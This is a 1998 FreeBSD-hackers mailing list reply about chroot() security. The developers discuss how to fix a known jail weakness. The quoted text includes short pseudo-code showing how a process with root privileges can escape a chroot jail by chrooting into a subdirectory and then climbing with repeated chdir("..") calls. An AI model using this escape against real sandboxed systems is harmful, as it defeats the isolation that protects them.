From owner-freebsd-hackers  Sat Nov 21 19:46:57 1998
Return-Path: <owner-freebsd-hackers@FreeBSD.ORG>
Received: (from majordom@localhost)
          by hub.freebsd.org (8.8.8/8.8.8) id TAA24133
          for freebsd-hackers-outgoing; Sat, 21 Nov 1998 19:46:57 -0800 (PST)
          (envelope-from owner-freebsd-hackers@FreeBSD.ORG)
Received: from gatekeeper.tsc.tdk.com (gatekeeper.tsc.tdk.com [207.113.159.21])
          by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id TAA24128
          for <freebsd-hackers@FreeBSD.ORG>; Sat, 21 Nov 1998 19:46:55 -0800 (PST)
          (envelope-from gdonl@tsc.tdk.com)
Received: from sunrise.gv.tsc.tdk.com (root@sunrise.gv.tsc.tdk.com [192.168.241.191])
	by gatekeeper.tsc.tdk.com (8.8.8/8.8.8) with ESMTP id TAA24075;
	Sat, 21 Nov 1998 19:45:50 -0800 (PST)
	(envelope-from gdonl@tsc.tdk.com)
Received: from salsa.gv.tsc.tdk.com (salsa.gv.tsc.tdk.com [192.168.241.194])
	by sunrise.gv.tsc.tdk.com (8.8.5/8.8.5) with ESMTP id TAA24248;
	Sat, 21 Nov 1998 19:45:49 -0800 (PST)
Received: (from gdonl@localhost)
	by salsa.gv.tsc.tdk.com (8.8.5/8.8.5) id TAA00182;
	Sat, 21 Nov 1998 19:45:47 -0800 (PST)
From: Don Lewis <Don.Lewis@tsc.tdk.com>
Message-Id: <199811220345.TAA00182@salsa.gv.tsc.tdk.com>
Date: Sat, 21 Nov 1998 19:45:47 -0800
In-Reply-To: Eivind Eklund <eivind@yes.no>
       "Re: Question on chroot()" (Nov 17, 12:54pm)
X-Mailer: Mail User's Shell (7.2.6 alpha(3) 7/19/95)
To: Eivind Eklund <eivind@yes.no>, Mike Smith <mike@smith.net.au>,
        Harold Gutch <logix@foobar.franken.de>
Subject: Re: Question on chroot()
Cc: zhihuizhang <bf20761@binghamton.edu>,
        hackers <freebsd-hackers@FreeBSD.ORG>
Sender: owner-freebsd-hackers@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.ORG

On Nov 17, 12:54pm, Eivind Eklund wrote:
} Subject: Re: Question on chroot()
} On Sun, Nov 15, 1998 at 12:56:03PM -0800, Mike Smith wrote:

} > It's quite difficult to break out of a chroot'ed environment, yes, and 
} > it's intended to be impossible, so obviously you can only get out 
} > through flaws in the implementation...
} 
} It is easy if you have root privileges inside the "jail".
} 
} 	/* pseudo-code */
} 	mkdir("mybreakdir", 0700);
} 	breakfd = open(".", 0, 0);
} 	chroot("mybreakdir");
} 	fchdir(breakfd);
} 	for (i=0; i<1000; i++)
} 		chdir("..");
} 	chroot(".");
} 
} I'm not sure if you need the fchdir();

You don't.

} chroot() is not supposed to
} affect your current directory.  I don't think anybody has fixed the
} above problem; it seems quite difficult to fix (you have to know which
} FDs are inside and outside the jail, which is non-trivial).

I implemented a local hack to solve the problem, though it has some
limitations.  I've thought of a better scheme that I have yet to
implement.  When I do, I'll post it for comments.

			---  Truck

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-hackers" in the body of the message